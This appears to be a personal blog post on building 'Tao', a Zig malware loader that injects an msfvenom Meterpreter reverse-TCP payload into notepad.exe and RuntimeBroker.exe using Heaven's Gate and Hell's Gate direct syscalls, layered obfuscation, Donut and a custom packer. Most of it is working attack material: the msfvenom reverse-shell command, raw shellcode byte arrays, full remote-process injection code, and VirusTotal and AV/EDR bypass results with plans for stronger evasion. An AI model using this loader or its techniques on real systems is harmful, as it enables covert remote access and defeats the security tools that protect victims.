Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters

ZYPE is a shellcode encryptor/obfuscator that can input a shellcode and generate a code snippet containing the encrypted/obfuscated shellcode in Zig. In Tao, we’ll use a lot of obfuscation using ZYPE.

ZYRA is an executable packer for PE, ELF and Mach-O. It encrypts the original executable and embeds it into another one so it can make both static and dynamic analysis to be more difficult and time-consuming.

Overall Workflow

This is the overall workflow for Tao, it’s relatively simplified so if you want to learn the full process, you can read the code on your own.

  1. Generate the encrypted reverse shell shellcode
    1. Generate a reverse shell shellcode using msfvenom by msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw -o revshell.bin.
    2. Use ZYPE to generate the encrypted shellcode by zype -f revshell.bin -m mac.
  2. Deobfuscate and call the above shellcode by direct system call in Hell’s Gate implementation.
    1. Use zig build-exe -target x86_64-windows src/hell.zig to build the hell.exe.
    2. Use .\Donut.exe hell.exe to turn the hell.exe into shellcode.
    3. Obfuscate the Hell’s Gate shellcode with ZYPE again.
  3. Wrap the Hell’s Gate shellcode in the previous step into Heaven’s Gate implementation.
    1. Use zig build to generate the final binary.
  4. Pack the binary.

If you think it’s not so easy to understand, I also draw a graph to illustrate the workflow.

Workflow

Since the obfuscation & the packing part is not the main point of this article, I won’t explain them here but you can go see the code on your own.

These are the target processes of Heaven’s Gate and Hell’s Gate in Tao.

Heaven’s GateHell’s Gate
Target ProcessRuntimeBroker.exenotepad.exe

heaven.zig

Most of the functions are the same with the previous explanation, it’s just some “rewrite them in Zig”, so I’m only going to focus on the different parts. These are the conditions to use Heaven’s Gate.

  1. The current process (Tao in this case) should be in WoW64
  2. The remote process should not be in WoW64, which means it should be a native 64-bit process

To better check this in the code, we’re going to use the following function to help us. This will use GetModuleHandleA and GetProcAddress to dinamically get the NtQueryInformationProcess function. By using this function, we can query if the passed process handle is from a WoW64 process.

pub fn is_process_wow64(ProcessHandle: HANDLE) BOOL {
    var pNtQueryInformationProcess: fnNtQueryInformationProcess = undefined;
    var pIsWow64: ?*anyopaque = null;

    const ntdll_handle = GetModuleHandleA("NTDLL.DLL") orelse {
        print("[!] GetModuleHandleA failed\n", .{});
        return 0;
    };

    const proc_addr = GetProcAddress(ntdll_handle, "NtQueryInformationProcess") orelse {
        print("[!] GetProcAddress Failed With Error: {d}\n", .{GetLastError()});
        return 0;
    };

    pNtQueryInformationProcess = @ptrCast(@alignCast(proc_addr));

    const status = pNtQueryInformationProcess(ProcessHandle, ProcessWow64Information, @ptrCast(&pIsWow64), @sizeOf(?*anyopaque), null);
    if (status != STATUS_SUCCESS) {
        print("[!] NtQueryInformationProcess Failed With Error: 0x{X:0>8}\n", .{@intFromEnum(status)});
        return 0;
    }

    return if (pIsWow64 != null) 1 else 0;
}

And if you remember, we have execute64.asm and remotethread.asm in the Heaven’s Gate introduction before, and here we’re going to use their shellcode version, which is bExecute64 and bFunction64.

const bExecute64 linksection(".text") = [_]u8{
    0x55, 0x89, 0xE5, 0x56, 0x57, 0x8B, 0x75, 0x08, 0x8B, 0x4D, 0x0C, 0xE8, 0x00, 0x00, 0x00, 0x00,
    0x58, 0x83, 0xC0, 0x2B, 0x83, 0xEC, 0x08, 0x89, 0xE2, 0xC7, 0x42, 0x04, 0x33, 0x00, 0x00, 0x00,
    0x89, 0x02, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x66, 0x8C, 0xD8, 0x66, 0x8E, 0xD0, 0x83, 0xC4, 0x14,
    0x5F, 0x5E, 0x5D, 0xC2, 0x08, 0x00, 0x8B, 0x3C, 0xE4, 0xFF, 0x2A, 0x48, 0x31, 0xC0, 0x57, 0xFF,
    0xD6, 0x5F, 0x50, 0xC7, 0x44, 0x24, 0x04, 0x23, 0x00, 0x00, 0x00, 0x89, 0x3C, 0x24, 0xFF, 0x2C,
    0x24,
};

const bFunction64 linksection(".text") = [_]u8{
    0xFC, 0x48, 0x89, 0xCE, 0x48, 0x89, 0xE7, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC8, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48,
    0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A,
    0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9,
    0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C,
    0x48, 0x01, 0xD0, 0x66, 0x81, 0x78, 0x18, 0x0B, 0x02, 0x75, 0x72, 0x8B, 0x80, 0x88, 0x00, 0x00,
    0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40,
    0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6,
    0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0,
    0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40,
    0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0,
    0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58,
    0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A,
    0x48, 0x8B, 0x12, 0xE9, 0x4F, 0xFF, 0xFF, 0xFF, 0x5D, 0x4D, 0x31, 0xC9, 0x41, 0x51, 0x48, 0x8D,
    0x46, 0x18, 0x50, 0xFF, 0x76, 0x10, 0xFF, 0x76, 0x08, 0x41, 0x51, 0x41, 0x51, 0x49, 0xB8, 0x01,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xD2, 0x48, 0x8B, 0x0E, 0x41, 0xBA, 0xC8,
    0x38, 0xA4, 0x40, 0xFF, 0xD5, 0x48, 0x85, 0xC0, 0x74, 0x0C, 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xEB, 0x0A, 0x48, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x48, 0x83, 0xC4, 0x50, 0x48, 0x89, 0xFC, 0xC3,
};

Remember, we need to put them in .text section since we need to execute the code. If you didn’t put it there, you need to modify the memory protection to executable.

Now, let’s see the main function of our heaven.zig, the injectShellcode function will be exported so that it’s more modulized. This function expects 3 input arguments, which are the process ID, the shellcode buffer and the length of the shellcode.

First, we’ll check the parameters are all valid.

if (process_id == 0 or shellcode_buf == null or shellcode_len == 0) {
    print("[-] Invalid parameters provided\n", .{});
    return 0;
}

After this, we turn the shellcode buffer to be function pointers so that we can easily call them later.

// Cast .text code byte stubs to function pointers
fn_execute64 = @ptrCast(@alignCast(&bExecute64[0]));
fn_function64 = @ptrCast(@alignCast(&bFunction64[0]));

Then, it’s about to get the remote process handle to get the control of it.

process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
if (process_handle == null) {
    print("[-] OpenProcess Failed with Error: {x}\n", .{GetLastError()});
    return success;
}

Once we get the handle, we’ll use the is_process_wow64 function to check the conditions to use Heaven’s Gate.

// Check if current process is Wow64
if (is_process_wow64(GetCurrentProcess()) == 0) {
    print("[-] Current process is not a Wow64 process\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
} else {
    print("[*] Current process is Wow64\n", .{});
}

// Check if remote process is 64-bit (not Wow64)
if (is_process_wow64(process_handle.?) != 0) {
    print("[-] Remote process {d} is a Wow64 process\n", .{process_id});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

Next, we need to allocate a executable memory in the remote process and write the shellcode into it.

// Allocate memory in remote process
virtual_memory = VirtualAllocEx(process_handle.?, null, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (virtual_memory == null) {
    print("[-] VirtualAllocEx Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[*] Allocated memory at: 0x{X} [{d} bytes]\n", .{ @intFromPtr(virtual_memory.?), shellcode_len });

// Write shellcode to remote process
if (WriteProcessMemory(process_handle.?, virtual_memory.?, shellcode_buf.?, shellcode_len, &written) == 0) {
    print("[-] WriteProcessMemory Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

Now, we can prepare the WoW64 context and perfom the Heaven’s Gate injection.

// Prepare 64-bit injection context
wow64_ctx.h.hProcess = process_handle.?;
wow64_ctx.s.lpStartAddress = virtual_memory;
wow64_ctx.p.lpParameter = null;
// hThread is already zeroed from std.mem.zeroes

print("[*] About to execute Heaven's Gate transition...\n", .{});

// Switch the processor to 64-bit mode and execute the 64-bit code stub
const result = fn_execute64(fn_function64, @ptrCast(&wow64_ctx));
print("[*] Heaven's Gate transition completed, result: {d}\n", .{result});

if (result == 0) {
    print("[-] Failed to switch processor context and execute 64-bit stub\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

// Check if remote thread was created
if (@intFromPtr(wow64_ctx.t.hThread) == 0) {
    print("[-] Failed to create remote thread under 64-bit mode\n", .{});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[*] Thread created: 0x{x}\n", .{@intFromPtr(wow64_ctx.t.hThread)});

Finally, we need to resume the suspended thread and clean up the handle.

// Resume thread that has been created in a suspended state
if (ResumeThread(wow64_ctx.t.hThread.?) == 0) {
    print("[-] ResumeThread Failed with Error: {d}\n", .{GetLastError()});
    if (process_handle) |handle| {
        _ = CloseHandle(handle);
    }
    return success;
}

print("[+] Successfully injected thread ({x})\n", .{@intFromPtr(wow64_ctx.t.hThread)});

success = 1;

// Cleanup
if (process_handle) |handle| {
    _ = CloseHandle(handle);
}

return success;

hell.zig

In hell.zig, we’ll need to declare the HellsGate and HellDescent functions that we’ve mentioned before. To do so, we can use the comptime keyword in Zig to export the assembly functions at compile time. By the way, Zig is now only supporting AT&T syntax, since it’s assembly parsing is provided by LLVM.

Only Support AT&T Syntax in Zig 0.14.1

So we need to change the code from original implementation to AT&T syntax. This is how I do it.

comptime {
    asm (
        \\.data
        \\w_system_call: .long 0
        \\
        \\.text
        \\.globl hells_gate
        \\hells_gate:
        \\    movl $0, w_system_call(%rip)
        \\    movl %ecx, w_system_call(%rip)
        \\    ret
        \\
        \\.globl hell_descent
        \\hell_descent:
        \\    mov %rcx, %r10
        \\    movl w_system_call(%rip), %eax
        \\    syscall
        \\    ret
    );
}

// External function declarations for the global assembly
pub extern fn hells_gate(syscall_number: DWORD) void;
pub extern fn hell_descent(arg1: usize, arg2: usize, arg3: usize, arg4: usize, arg5: usize, arg6: usize, arg7: usize, arg8: usize, arg9: usize, arg10: usize, arg11: usize) callconv(.C) NTSTATUS;

Then, we’ll setup the VxTable and VxTableEntry for the later use.

// Structures for Hell's Gate
pub const VxTableEntry = extern struct {
    addr_ptr: ?PVOID,
    hash: u64,
    system_call: WORD,
};

pub const VxTable = extern struct {
    NtAllocateVirtualMemory: VxTableEntry,
    NtWriteVirtualMemory: VxTableEntry,
    NtProtectVirtualMemory: VxTableEntry,
    NtCreateThreadEx: VxTableEntry,
};

Beside this, the most inportant function in hell.zig is classicInjectionViaSyscalls. This function takes 4 parameters, which are the Vx table, the remote process handle, the payload to be executed and the length of the payload. That function will perform the classic process injection but with system calls. This table shows the difference between the normal classic process injection and the process injection via syscalls.

NormalVia Syscall
Allocate the virtual memoryVirtualAllocExNtAllocateVirtualMemory
Write the virtual memoryWriteProcessMemoryNtWriteVirtualMemory
Change the memory protectionVirtualProtectExNtProtectVirtualMemory
Create a remote thread for shellcodeCreateRemoteThreadNtCreateThreadEx

If you remeber the Hell’s Gate workflow we mentioned previously, the way to use Hell’s Gate to perform system call is use HellsGate function to set the SSN into the wSystemCall global variable, then use HellDescent to call the system call. So it’s just like doing what we do in the normal process injection, let’s review the steps of classic process injection first.

  1. Get the process handle.
  2. Allocate the memory in the target process.
  3. Write the payload in the memory.
  4. Modify the memory protection to be executable.
  5. Create a remote thread in the target process.
  6. Wait for the thread to finish and release the resources.

Since this function (classicInjectionViaSyscalls) is already receiving a target process handle, so we can skip the first step and directly jump to allocating the memory on the target process. You can just see the code below but to make it more clear, I modify the name of HellsGate and HellDescent to hells_gate and hell_descent just for the coding style in Zig.

// Step 1: Allocate memory using Hell's Gate
hells_gate(vx_table.NtAllocateVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(&address), 0, @intFromPtr(&size), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE, 0, 0, 0, 0, 0);

if (status != nt_success) {
    print("[!] NtAllocateVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}
print("[+] Allocated Address At : 0x{X} Of Size : {d}\n", .{ @intFromPtr(address), size });

After we allocated the memory, we can start to write shellcode on it.

// Step 2: Write the payload
print("\t[i] Writing Payload Of Size {d} ... ", .{payload_size});
hells_gate(vx_table.NtWriteVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(address), @intFromPtr(payload), payload_size, @intFromPtr(&bytes_written), 0, 0, 0, 0, 0, 0);

if (status != nt_success or bytes_written != payload_size) {
    print("[!] NtWriteVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    print("[i] Bytes Written : {d} of {d}\n", .{ bytes_written, payload_size });
    return false;
}

Then, change the memory protection.

// Step 3: Change memory protection to executable
hells_gate(vx_table.NtProtectVirtualMemory.system_call);
status = hell_descent(@intFromPtr(process_handle), @intFromPtr(&address), @intFromPtr(&payload_size), PAGE_EXECUTE_READWRITE, @intFromPtr(&old_protection), 0, 0, 0, 0, 0, 0);

if (status != nt_success) {
    print("[!] NtProtectVirtualMemory Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}

Finally, execute the payload by creating a new thread on the target process.

// Step 4: Execute the payload via thread
print("\t[i] Running Thread Of Entry 0x{X} ... ", .{@intFromPtr(address)});
hells_gate(vx_table.NtCreateThreadEx.system_call);
status = hell_descent(@intFromPtr(&thread_handle), THREAD_ALL_ACCESS, 0, // NULL object attributes
    @intFromPtr(process_handle), @intFromPtr(address), 0, // NULL parameter
    0, // Create flags
    0, // Stack zero bits
    0, // Size of stack commit
    0, // Size of stack reserve
    0 // Bytes buffer
);

if (status != nt_success) {
    print("[!] NtCreateThreadEx Failed With Error : 0x{X:0>8}\n", .{@intFromEnum(status)});
    return false;
}

So far, the Hell’s Gate is finished successfully, we just need to assemble all the stuffs together and build the final Tao.exe. I’ll skip this part because there’s nothing worth to be mentioned, it’s literally just putting all the things together. So let’s jump to the final part and see how Tao performs!

Epilogue - Findings & Results

Static Analysis

Let’s see the Virustotal scan result first!

Before Packed by ZYRA

After Packed by ZYRA

It looks like the one being packed is less suspicious than another on Virustotal, but on the other platform like Filescan.io, it’s considered more malicious. I take a look at the report and I found that it’s because the payload decryption will be detected and regarded as a malicious behaviour, also the higher entropy will being caught by some security solutions.

It turns out that Tao is much more easier to be detected then I thought. I expect that there’s hardly a vendor could detect the malicious code since I’ve already done a lot of obfuscation and even nested obfuscation like using a self-made packer.

If we look closer to the scanning result, we can see that the most popular threat label is “trojan.hack/msfshell”, and that’s indeed the reverse shell shellcode we’ve used.

Despite there’s still 9 vendors labeled it as an malicious file, it did bypass over 60 vendors’ detection. This is the static analysis part, let’s see Tao’s performance in dynamic analysis.

Dynamic Analysis

So I’ve installed some of the famous AV/EDR and try to run Tao on my isolated environment, and this table shows its capability to bypass the dynamic detection. The Tao.exe is the one not packed and Tao.zyra.exe is the one being packed.

AV/EDRTao.exeTao.zyra.exe
Bitdefender
ESET
Microsoft Defender Real-time Protection
Qihoo 360
Trend Micro PC-cillin

It can really bypass some famous AV/EDR but not the majority of them. I’ve only tested Tao on these security solutions but it can shows the approximate result. It’s cool that the one being packed is even more possible to be blocked, I guess it’s because the runtime file dropping will be marked as suspicious behaviour.

Limitations

Despite I’ve done a lot of anti-analysis techniques on this malware, it still not bypassed some of the AV/EDR. I concluded that the possible reasons are:

  1. Too many shellcodes from Metasploit.
  2. Donut will generate some signatures.
  3. File dropping from ZYRA will be detected.
  4. Import table contains WinAPI for process injection.
  5. The decrypted/deobfuscated shellcode will be detected during runtime.

Challenges I met

While doing this research, I’ve met some issues that stucked me for a while, such as the shellcode generated by Donut will terminate the original process since it’s a full EXE file. Also, I want to interact with the hell.zig with its exported functions originally, but I found that the compiler won’t allowed a x86 program to use x64 registers like r10, which will be used in Hell’s Gate. For this, I’ve tried few workarounds. For example, I first tried to compiled hell.zig to a library instead of an EXE, but it turns out the compiler won’t allow a x86 program to link x64 library either. I resolved this issue finally by turning the hell.zig into a shellcode using Donut and execute it in main.zig.

There’re still many obstacles I met when I’m doing this project, but most of them is resolved. I’ve learnt a lot from this and I think I can do better next time. Malware analysis isn’t an easy thing, and malware development is even more so. But I think I had a lot of fun in this kind of attack and defense, both sites are trying to bypass each other’s detection and tricks. So I’ll keep doing this kind of stuff, keep learning from this war of attackers and defenders and make myself a better hacker.

Thank you a lot for reading this far, hope both of us learnt new things from this article.

Future Work

I think there several things that can be done better, so I’ll write them down and try to finish them when I get time.

  1. Turn it into a Mythic C2 agent.
  2. The shellcode generated by Donut from an full EXE will interrupt the injected process, which is an issue that needs to be solved.
  3. Better evading techniques to bypass more AV/EDR.

References & Credits